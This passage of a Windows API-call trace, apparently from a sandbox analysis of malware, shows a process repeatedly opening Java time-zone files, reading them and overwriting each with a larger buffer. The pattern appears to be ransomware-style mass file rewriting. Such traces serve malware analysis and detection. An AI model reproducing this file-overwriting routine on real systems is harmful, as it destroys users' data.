lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0136.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Oral", cchWideChar=4, lpMultiByteStr=0x1f7ace4, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Oral", lpUsedDefaultChar=0x0) returned 4 [0136.504] ReadFile (in: hFile=0x1cc, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1cd, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x359f2bc*=0x1cd, lpOverlapped=0x0) returned 1 [0136.506] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.506] WriteFile (in: hFile=0x1cc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x755, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x359f2d0*=0x755, lpOverlapped=0x0) returned 1 [0136.506] CloseHandle (hObject=0x1cc) returned 1 [0136.507] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh87" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh87"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.511] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.511] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x12d5 [0136.511] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.511] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.511] ReleaseMutex (hMutex=0x168) returned 1 [0136.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riyadh87", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riyadh87", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Riyadh87", lpUsedDefaultChar=0x0) returned 8 [0136.512] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x12d5, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x359f2bc*=0x12d5, lpOverlapped=0x0) returned 1 [0136.528] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.769] WriteFile (in: hFile=0x1f0, lpBuffer=0x28821b8*, nNumberOfBytesToWrite=0x185d, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28821b8*, lpNumberOfBytesWritten=0x359f2d0*=0x185d, lpOverlapped=0x0) returned 1 [0136.769] CloseHandle (hObject=0x1f0) returned 1 [0136.769] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Taipei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\taipei"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.795] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.795] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x17d [0136.795] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.796] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.796] ReleaseMutex (hMutex=0x168) returned 1 [0136.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Taipei", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Taipei", cchWideChar=6, lpMultiByteStr=0x1f7acfc, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Taipei", lpUsedDefaultChar=0x0) returned 6 [0136.796] ReadFile (in: hFile=0x1cc, lpBuffer=0x25be3f8, nNumberOfBytesToRead=0x17d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25be3f8*, lpNumberOfBytesRead=0x359f2bc*=0x17d, lpOverlapped=0x0) returned 1 [0136.797] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.797] WriteFile (in: hFile=0x1cc, lpBuffer=0x2896ef8*, nNumberOfBytesToWrite=0x705, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2896ef8*, lpNumberOfBytesWritten=0x359f2d0*=0x705, lpOverlapped=0x0) returned 1 [0136.797] CloseHandle (hObject=0x1cc) returned 1 [0136.798] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Ust-Nera" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\ust-nera"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.798] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.798] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x255 [0136.798] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.798] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.798] ReleaseMutex (hMutex=0x168) returned 1 [0136.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ust-Nera", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ust-Nera", cchWideChar=8, lpMultiByteStr=0x1f732cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ust-Nera", lpUsedDefaultChar=0x0) returned 8 [0136.799] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x255, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x359f2bc*=0x255, lpOverlapped=0x0) returned 1 [0136.800] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.800] WriteFile (in: hFile=0x1cc, lpBuffer=0x2896ef8*, nNumberOfBytesToWrite=0x7dd, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2896ef8*, lpNumberOfBytesWritten=0x359f2d0*=0x7dd, lpOverlapped=0x0) returned 1 [0136.800] CloseHandle (hObject=0x1cc) returned 1 [0136.800] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Canary" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\canary"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0139.946] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0139.946] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x414 [0139.946] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0139.946] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0139.946] ReleaseMutex (hMutex=0x168) returned 1 [0139.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Canary", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0139.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Canary", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Canary", lpUsedDefaultChar=0x0) returned 6 [0139.946] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x414, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x359f2bc*=0x414, lpOverlapped=0x0) returned 1 [0140.673] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0140.673] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x99c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x99c, lpOverlapped=0x0) returned 1 [0140.674] CloseHandle (hObject=0x1dc) returned 1 [0140.674] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Adelaide" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\adelaide"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0140.675] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0140.675] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4c8 [0140.675] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0140.675] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.012] ReleaseMutex (hMutex=0x168) returned 1 [0141.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adelaide", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.012] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Adelaide", cchWideChar=8, lpMultiByteStr=0x1f7344c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Adelaide", lpUsedDefaultChar=0x0) returned 8 [0141.012] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x4c8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x359f2bc*=0x4c8, lpOverlapped=0x0) returned 1 [0141.027] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.027] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa50, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f2d0*=0xa50, lpOverlapped=0x0) returned 1 [0141.027] CloseHandle (hObject=0x1dc) returned 1 [0141.027] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Australia\\Lord_Howe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\australia\\lord_howe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.029] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.029] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x3f4 [0141.029] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.029] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.033] ReleaseMutex (hMutex=0x168) returned 1 [0141.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lord_Howe", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Lord_Howe", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Lord_Howe", lpUsedDefaultChar=0x0) returned 9 [0141.033] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3f4, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x359f2bc*=0x3f4, lpOverlapped=0x0) returned 1 [0141.054] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.054] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x97c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x97c, lpOverlapped=0x0) returned 1 [0141.054] CloseHandle (hObject=0x1dc) returned 1 [0141.055] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\EST5EDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\est5edt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.055] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.055] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4f8 [0141.055] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.056] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.069] ReleaseMutex (hMutex=0x168) returned 1 [0141.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EST5EDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.069] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EST5EDT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EST5EDT", lpUsedDefaultChar=0x0) returned 7 [0141.069] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x4f8, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x359f2bc*=0x4f8, lpOverlapped=0x0) returned 1 [0141.079] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.079] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x359f2d0*=0xa80, lpOverlapped=0x0) returned 1 [0141.080] CloseHandle (hObject=0x1dc) returned 1 [0141.080] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+4" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.083] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.083] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1b [0141.083] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.083] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.093] ReleaseMutex (hMutex=0x168) returned 1 [0141.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+4", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.093] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+4", cchWideChar=5, lpMultiByteStr=0x1f7ad5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+4", lpUsedDefaultChar=0x0) returned 5 [0141.093] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x359f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.094] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.094] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.095] CloseHandle (hObject=0x1dc) returned 1 [0141.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-11" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-11"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.095] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.096] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1b [0141.096] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.096] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.108] ReleaseMutex (hMutex=0x168) returned 1 [0141.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-11", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-11", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-11", lpUsedDefaultChar=0x0) returned 6 [0141.109] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f88b28, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88b28*, lpNumberOfBytesRead=0x359f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.110] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.110] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.111] CloseHandle (hObject=0x1dc) returned 1 [0141.111] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-6" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.111] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.112] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1b [0141.112] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.112] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.119] ReleaseMutex (hMutex=0x168) returned 1 [0141.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-6", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-6", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-6", lpUsedDefaultChar=0x0) returned 5 [0141.119] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f88b28, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88b28*, lpNumberOfBytesRead=0x359f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.120] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0141.120] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.120] CloseHandle (hObject=0x1dc) returned 1 [0141.121] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.122] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.122] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4ac [0141.122] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0141.122] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.122] ReleaseMutex (hMutex=0x168) returned 1 